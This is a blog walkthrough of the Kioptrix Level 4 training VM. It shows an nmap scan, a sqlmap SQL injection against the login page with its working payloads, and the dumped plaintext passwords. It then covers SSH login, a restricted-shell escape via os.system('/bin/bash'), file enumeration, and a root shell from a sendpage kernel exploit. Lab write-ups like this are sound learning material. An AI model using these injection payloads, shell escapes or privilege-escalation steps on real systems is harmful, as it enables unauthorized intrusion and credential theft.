Friday, May 22, 2015

Kioptrix Level 4 Walkthough


This is the first in a long series of Vulnerable Virtual Machine Walkthroughs that I'll be posting to this site.By looking at the date of my last post, one would assume that I've gone dormant, but that's definitely not the case. So with out further a due, I bring you Kioptrix Level 4.

Enumeration

root@kali:~# nmap 10.1.1.10
Starting Nmap 6.47 ( http://nmap.org ) at 2015-05-21 09:05 EDT
Nmap scan report for 10.1.1.10
Host is up (0.00032s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27:C2:50:41 (Cadmus Computer Systems)


Nmap done: 19 IP addresses (3 hosts up) scanned in 9.10 seconds
root@kali:~#


Visiting the webpage on port 80 revealed a login page which may be vulnerable to some sql injection:

Using a bunch of the usual combinations, I was able to provoke the site into revealing the underlying dbms (MYSQL)
With this information I was able to specify the dmbs within my use of sqlmap Sqlmap output

root@kali:~# sqlmap -u "http://10.1.1.10/checklogin.php" --dbms=MySQL --level=5 --risk=3 --data="myusername=admin&mypassword=test" --dump
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:14:03

[09:14:03] [INFO] testing connection to the target URL
[09:14:04] [INFO] heuristics detected web page charset 'ascii'
[09:14:04] [INFO] testing if the target URL is stable. This can take a couple of seconds
[09:14:05] [INFO] target URL is stable
[09:14:05] [INFO] testing if POST parameter 'myusername' is dynamic
[09:14:05] [WARNING] POST parameter 'myusername' does not appear dynamic
[09:14:05] [WARNING] heuristic (basic) test shows that POST parameter 'myusername' might not be injectable
[09:14:05] [INFO] testing for SQL injection on POST parameter 'myusername'
[09:14:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:14:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:14:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
[09:14:07] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[09:14:08] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:14:08] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Generic comment)'
[09:14:09] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)'
[09:14:10] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)'
[09:14:10] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[09:14:10] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[09:14:10] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[09:14:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[09:14:10] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
[09:14:10] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses'
[09:14:10] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)'
[09:14:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[09:14:10] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[09:14:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[09:14:10] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[09:14:10] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[09:14:11] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[09:14:11] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[09:14:11] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[09:14:12] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'
Blah, blah,blah...................blah...........Ultimately revealing usernames and passwords with in the underlying database
Place: POST
Parameter: mypassword
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: myusername=admin&mypassword=-4827' OR (7207=7207) AND 'wyxA'='wyxA

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: myusername=admin&mypassword=test' AND 8831=BENCHMARK(5000000,MD5(0x46556262)) AND 'KxNZ'='KxNZ
---
[09:16:14] [INFO] testing MySQL
[09:16:14] [INFO] confirming MySQL
[09:16:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.0
[09:16:14] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[09:16:14] [INFO] fetching current database
[09:16:14] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:16:14] [INFO] retrieved: members
[09:16:15] [INFO] fetching tables for database: 'members'
[09:16:15] [INFO] fetching number of tables for database 'members'
[09:16:15] [INFO] retrieved: 1
[09:16:15] [INFO] retrieved: members
[09:16:15] [INFO] fetching columns for table 'members' in database 'members'
[09:16:15] [INFO] retrieved: 3
[09:16:15] [INFO] retrieved: id
[09:16:16] [INFO] retrieved: username
[09:16:16] [INFO] retrieved: password
[09:16:17] [INFO] fetching entries for table 'members' in database 'members'
[09:16:17] [INFO] fetching number of entries for table 'members' in database 'members'
[09:16:17] [INFO] retrieved: 2
[09:16:17] [INFO] retrieved: 1
[09:16:17] [INFO] retrieved: MyNameIsJohn
[09:16:18] [INFO] retrieved: john
[09:16:18] [INFO] retrieved: 2
[09:16:19] [INFO] retrieved: ADGAdsafdfwt4gadfga==
[09:16:20] [INFO] retrieved: robert
[09:16:21] [INFO] analyzing table dump for possible password hashes
Database: members
Table: members
[2 entries]
+----+----------+-----------------------+
| id | username | password              |
+----+----------+-----------------------+
| 1  | john     | MyNameIsJohn          |
| 2  | robert   | ADGAdsafdfwt4gadfga== |
+----+----------+-----------------------+

[09:16:21] [INFO] table 'members.members' dumped to CSV file '/usr/share/sqlmap/output/10.1.1.10/dump/members/members.csv'
[09:16:21] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/10.1.1.10'

[*] shutting down at 09:16:21

root@kali:~#


Now lets attempt to ssh in with john's credentials

root@kali:~# ssh john@10.1.1.10
The authenticity of host '10.1.1.10 (10.1.1.10)' can't be established.
RSA key fingerprint is 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.1.1.10' (RSA) to the list of known hosts.
john@10.1.1.10's password:
Connection closed by 10.1.1.10
root@kali:~# ssh john@10.1.1.10
john@10.1.1.10's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ ?
cd  clear  echo  exit  help  ll  lpath  ls

Awesome, the credentials worked but now we're trapped in a stupid shell..... how do we escape?

Research on how to escape this shell lead me to the following webpage:

http://www.aldeid.com/wiki/Lshell

Worked like a charm!

john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$


john@Kioptrix4:~$ uname -a
Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux

Now time to take a look around and escalate privilege , looks like this Linux Kernel is vulnerable to some of the old favorites.

john@Kioptrix4:~$ cat /etc/sudoers
cat: /etc/sudoers: Permission denied
john@Kioptrix4:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash
john:x:1001:1001:,,,:/home/john:/bin/kshell
robert:x:1002:1002:,,,:/home/robert:/bin/kshell
john@Kioptrix4:~$ pwd
/home/john
john@Kioptrix4:~$ ls
john@Kioptrix4:~$ cd ..
john@Kioptrix4:/home$ ls
john  loneferret  robert
john@Kioptrix4:/home$ cd loneferret
john@Kioptrix4:/home/loneferret$ ls
john@Kioptrix4:/home/loneferret$ ls -al
total 44
drwxr-xr-x 2 loneferret loneferret 4096 2012-02-06 16:38 .
drwxr-xr-x 5 root       root       4096 2012-02-04 18:05 ..
-rw------- 1 loneferret loneferret   62 2012-02-06 20:24 .bash_history
-rw-r--r-- 1 loneferret loneferret  220 2012-02-04 09:58 .bash_logout
-rw-r--r-- 1 loneferret loneferret 2940 2012-02-04 09:58 .bashrc
-rw-r--r-- 1 loneferret loneferret    1 2012-02-05 10:37 .lhistory
-rw------- 1 root       root         68 2012-02-04 10:05 .my.cnf.5086
-rw------- 1 root       root          1 2012-02-04 10:05 .mysql.5086
-rw------- 1 loneferret loneferret    1 2012-02-05 10:38 .mysql_history
-rw------- 1 loneferret loneferret    9 2012-02-06 16:39 .nano_history
-rw-r--r-- 1 loneferret loneferret  586 2012-02-04 09:58 .profile
-rw-r--r-- 1 loneferret loneferret    0 2012-02-04 10:01 .sudo_as_admin_successful
john@Kioptrix4:/home/loneferret$ more .sudo_as_admin_successful
john@Kioptrix4:/home/loneferret$ more .bash_history
.bash_history: Permission denied

As you can see I came across lots of interesting things including mysql and nice stuff in user directories, but it was my old faithful Linux Sendpage exploit which brought home the bacon.


john@Kioptrix4:~$ ./sendpage
#






No comments:

Post a Comment